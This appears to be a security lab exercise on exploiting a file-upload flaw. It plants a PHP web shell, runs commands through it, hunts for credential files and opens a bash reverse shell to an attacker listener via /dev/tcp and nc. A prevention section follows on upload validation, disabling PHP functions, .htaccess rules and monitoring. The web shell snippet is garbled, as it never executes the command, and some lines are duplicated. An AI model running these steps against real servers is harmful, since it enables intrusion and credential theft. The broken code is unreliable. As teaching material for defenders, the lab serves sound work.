Objective: Learn to exploit a web shell for privilege escalation on a compromised web server, and understand how to secure web servers against such attacks.
Scenario: Web shells are malicious scripts uploaded to a web server to allow attackers to execute arbitrary commands. Once a web shell is deployed, attackers can use it to interact with the server’s file system, extract sensitive information, and escalate privileges. Your task is to deploy and exploit a web shell while implementing measures to secure the server.
Lab Setup
- Environment:
- A web server vulnerable to file upload attacks.
- Tools Required:
- A web shell script (e.g., PHP-based shell).
- Terminal access for interacting with the web shell.
Lab Steps
Step 1: Deploy a Web Shell
- Identify a file upload vulnerability in the web application.
- Example: An upload form that doesn’t validate file types.
- Create a simple PHP web shell:
<?php if(isset($_REQUEST['cmd'])) { echo '<pre>'; echo '</pre>'; } ?>
- Save the file as
shell.php
.
- Save the file as
- Upload the web shell to the server using the vulnerable upload form.
- Access the uploaded web shell in your browser:
http://<target_ip>/uploads/shell.php
Step 2: Interact with the Web Shell
- Use the web shell to execute system commands:
http://<target_ip>/uploads/shell.php?cmd=ls
- Replace
ls
with other commands to explore the server.
- Replace
- Identify sensitive files, such as:
- Configuration files (e.g.,
wp-config.php
,.env
). - User credentials or database connections.
- Configuration files (e.g.,
Step 3: Escalate Privileges
- Search for privilege escalation vectors:
- Writable cron jobs.
- Misconfigured file permissions.
- SUID binaries.
- Deploy a reverse shell payload through the web shell:
http://<target_ip>/uploads/shell.php?cmd=bash -i >& /dev/tcp/<your_ip>/4444 0>&1
- Replace
<your_ip>
and4444
with your listener’s IP and port.
- Replace
- Set up a listener on your machine:
nc -lvnp 4444
- Verify the reverse shell connection and check your privileges:
whoami
Solution
Explanation:
- A web shell provides attackers with remote access to a server’s command line.
- By escalating privileges, attackers can gain root access and compromise the entire server.
Prevention:
- Validate File Uploads:
- Restrict allowed file types using MIME type validation.
- Example configuration in PHP:
$allowed = ['image/jpeg', 'image/png']; if (!in_array($_FILES['file']['type'], $allowed)) { die('Invalid file type.'); }
- Disable Dangerous PHP Functions:
- Disable functions like
system
,exec
, andshell_exec
inphp.ini
:disable_functions = system,exec,shell_exec,passthru
- Disable functions like
- Restrict Directory Permissions:
- Ensure upload directories cannot execute scripts:
chmod -R 750 /var/www/uploads
- Add a
.htaccess
file to deny script execution:<FilesMatch ".*\.(php|pl|py|jsp)$"> deny from all </FilesMatch>
- Add a
- Ensure upload directories cannot execute scripts:
- Monitor and Log Activity:
- Use web server logs to detect unusual activity:
sudo tail -f /var/log/apache2/access.log
- Use web server logs to detect unusual activity:
- Deploy a Web Application Firewall (WAF):
- Use tools like ModSecurity to filter malicious requests.
Testing and Verification
- Test file upload forms to ensure only allowed file types are accepted.
- Attempt to execute scripts in the upload directory to confirm they are blocked.
- Monitor logs for evidence of malicious activity.
Reflection
This exercise demonstrates how web shells can be used to compromise a server and escalate privileges. By implementing strong validation, disabling dangerous functions, and monitoring server activity, you can effectively secure web servers against such attacks.
0 Comments